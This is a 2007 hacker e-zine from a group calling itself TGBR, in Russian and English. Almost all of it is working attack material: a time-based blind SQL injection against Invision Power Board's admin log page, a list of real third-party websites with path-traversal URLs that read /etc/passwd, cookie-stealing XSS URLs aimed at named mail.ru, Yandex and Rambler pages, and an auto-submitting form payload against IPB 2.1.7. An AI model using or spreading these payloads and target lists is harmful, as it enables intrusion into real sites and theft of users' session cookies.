The Gray Brotherhood Community
                            Chanel: #TGBR, #hack-psihoz, Service: irc.dalnet.ru, Port: 6667
Содержание

TGBR E-ZineS #1:

IPB <= 2.3.3 SQL injection:

Код:
-------------
adminlogs.php
-------------

BUG FOUND: perdimonokl aka 4nob1oz
BUG FOUND DATE: 24/11/2007
BUG DISCOVERED DATE: NOT YET

/*
* VULN FUNCTION
* ----------------
*
* function view()
*
* ----------------
* VULN CODE
*
* --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
*   else
*  {
*   $this->ipsclass->input['search_string'] = urldecode($this->ipsclass->input['search_string']);
*
*   $dbq = "m.".$this->ipsclass->input['search_type']." LIKE '%".$this->ipsclass->input['search_string']."%'";
*
*   $row = $this->ipsclass->DB->build_and_exec_query( array( 'select' => 'COUNT(m.id) as count', 'from' => 'admin_logs m', 'where' => $dbq ) );
*
*   $row_count = $row['count'];
*
*   $query = "&act=adminlog&code=view&search_type={$this->ipsclass->input['search_type']}&search_string=".urlencode($this->ipsclass->input['search_string']);
*
*   $this->ipsclass->DB->cache_add_query( 'adminlogs_view_two', array( 'dbq' => $dbq, 'limit_a' => $start ) );
*   $this->ipsclass->DB->cache_exec_query();
*  }
*
* --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
*
*/

EXPLOIT
-------

adsess=85f93b41dd3244e5680f5085b28b56bf ---> When you login to admin panel you open  admin session and you can see it in variable "adsess="

Replace the "adsess=" in url with your own

http://localhost/forum/admin/index.php?adsess=85f93b41dd3244e5680f5085b28b56bf&section=admin&act=adminlog&code=view&act=adminlog&section=admin&search_string=333&search_type=act+and+1=if(substring(version(),1,1)=5,1,benchmark(999999,md5(now())))--



Include:

http://www.penguinadventure.com/index.php?file=../../../../../../../../etc/passwd
http://www.strikingdifference.com/index.php?file=../../../../../../../etc/passwd
http://ff.penguinadventure.com/index.php?file=../../../../../../../etc/passwd
http://bccd.cs.uni.edu/cgi-bin/viewcvs.cgi/bccdrt/index.php?view=../../../../../../../etc/passwd
http://dd.penguinadventure.com/index.php?file=../../../../../../../etc/passwd
http://www.coe.ou.edu/constgllry/index.php?file=../../../../../../../etc/passwd
http://www.motionart.net/index.php?file=../../../../../../../etc/passwd
http://bccd.cs.uni.edu/cgi-bin/viewcvs.cgi/bccdrt/index.php?view=../../../../../../../etc/passwd
http://stisidore.org/~doster/index.php?file=../../../../../../../etc/passwd
http://www.kneuro.net/littlesite/index.php?file=../../../../../../../etc/passwd
http://tennesseeencyclopedia.net/index.php?pg=../../../../../../../etc/passwd
http://www.chaminade.edu/index.php?pg=../../../../../../../etc/passwd
http://www.byjupiter.com/index.php?pg=../../../../../../../etc/passwd
http://www.powershacks.com/index.php?pg=/../../../../../../etc/passwd
http://www.freqofnature.com/index.php?pg=/../../../../../../etc/passwd
http://www.southwestguitar.com/index.php?pg=/../../../../../../etc/passwd
http://www.freshtastemeals.com/index.php?pg=/../../../../../../etc/passwd
http://www.aceinet.com/index.php?pg=/../../../../../../etc/passwd
http://www.powershacks.com/index.php?pg=/../../../../../../etc/passwd
http://wrightstax.com/index.php?pg=/../../../../../../etc/passwd
http://knights.geneseo.edu/index.php?pg=/../../../../../../etc/passwd
http://www.silvercreekny.net/index.php?pg=/../../../../../../etc/passwd
http://www.aceinet.com/index.php?pg=/../../../../../../etc/passwd
http://chico.com/kellybrown/index.php?pg=/../../../../../../etc/passwd


XSS

http://hosting.mail.ru/Login.jsp?password="><img src=javascript:alert(document.cookie)>
http://kubok.yandex.ru/regkubok_zachet/demo_1189295051718576&subject="><img src=javascript:alert(document.cookie)>
http://help.rambler.ru/feedback.html?s=7715&fio="><img src=javascript:alert(document.cookie)>
http://games.mail.ru/game/?fletter=M&lang="><script>alert()</script>
http://love.rambler.ru/my/edit_voice_welcome.phtml?tburl="><script>alert(document.cookie)</script>
http://soft.mail.ru/uregistration/anketa_profile.php?adsfrom=search&f1="><script>alert()</script>
http://ds.rambler.ru/index.php?p=news&pubId=243&pubMode=<script>alert(document.cookie)</script>
http://miss.rambler.ru/srch/?sort=0&set=miss&words="><script>alert(document.cookie)</script>
http://maffia.rambler.ru/info/info.php?Ij4iPjxpbWcgc3JjPWphdmFzY3JpcHQ6YWxlcnQoZG9jdW1lbnQuY29va2llKT4=
http://skate.rambler.ru/popup.html?alt=</title><script>alert(document.cookie)</script>
http://topshop.rambler.ru/topshop.html?words="><script>alert(document.cookie)</script>
http://forum.yandex.ru/kubok/netrix.xhtml? ">testa <script>alert('testa')</script>
http://3sider.mail.ru/register.php?Hname='><script>alert(document.cookie)</script>
http://kp.mail.ru/read_story.html?story_id="><script>alert(document.cookie)</script>
http://direct.yandex.ru/catalog/vipurl.pl?type=confirm&UA=0&change=yes&agree=yes&UA="><script>alert(document.cookie)</script>


Пассивная хсс на веб-хаке ../soft/wh_xss.rar 1кб

IPB 2.1.7. Passive xss by Don1-2 (не опубликованые хсс)
XSS#1
Скачать видео
Вес - 601кб

Код:
<body onload="preview.submit();">
<center>
<form id='postingform' action="http://САЙТ_ФОРУМ_ipb.2.1.7/index.php?act=post&do=new_post&f=НОМЕР_ТЕМЫ" method="post" name="preview">
<input type="hidden" name="st" size="30" tabindex="3" maxlength="300" value='0'>
<input type="hidden" name="act" size="30" tabindex="3" maxlength="300" value='Post'>
<input type="hidden" name="s" size="30" tabindex="3" maxlength="300" value=''>
<input type="hidden" name="TopicTitle" size="30" tabindex="3" maxlength="300" value='tttttttttt1'>
<input type="hidden" name="TopicDesc" size="30" tabindex="3" maxlength="300" value='tttttttttt2'>
<input type="hidden" name="poll_question" size="30" tabindex="3" maxlength="300" value='tttttttttt3'>
<input type="hidden" name="question[1]" size="30" tabindex="3" maxlength="300" value='</script><script>alert(document.cookie)</script><script>'>
<input type="hidden" name="Post" size="30" tabindex="3" maxlength="300" value='textatatatatatatatata'>
<input type="hidden" name="enableemo" size="30" tabindex="3" maxlength="300" value='yes'>
<input type="hidden" name="enablesig" size="30" tabindex="3" maxlength="300" value='yes'>
<input type="hidden" name="mod_options" size="30" tabindex="3" maxlength="300" value='nowt'>
<input type="hidden" name="iconid" size="30" tabindex="3" maxlength="300" value='0'>
<input type="hidden" name="preview" size="30" tabindex="3" maxlength="300" value='Предварительный просмотр'>

XSS#2
Скачать видео
Вес - 220кб

Содержание
                           

Created by TGBR Community
All Right's Reserved Trash 2007 ©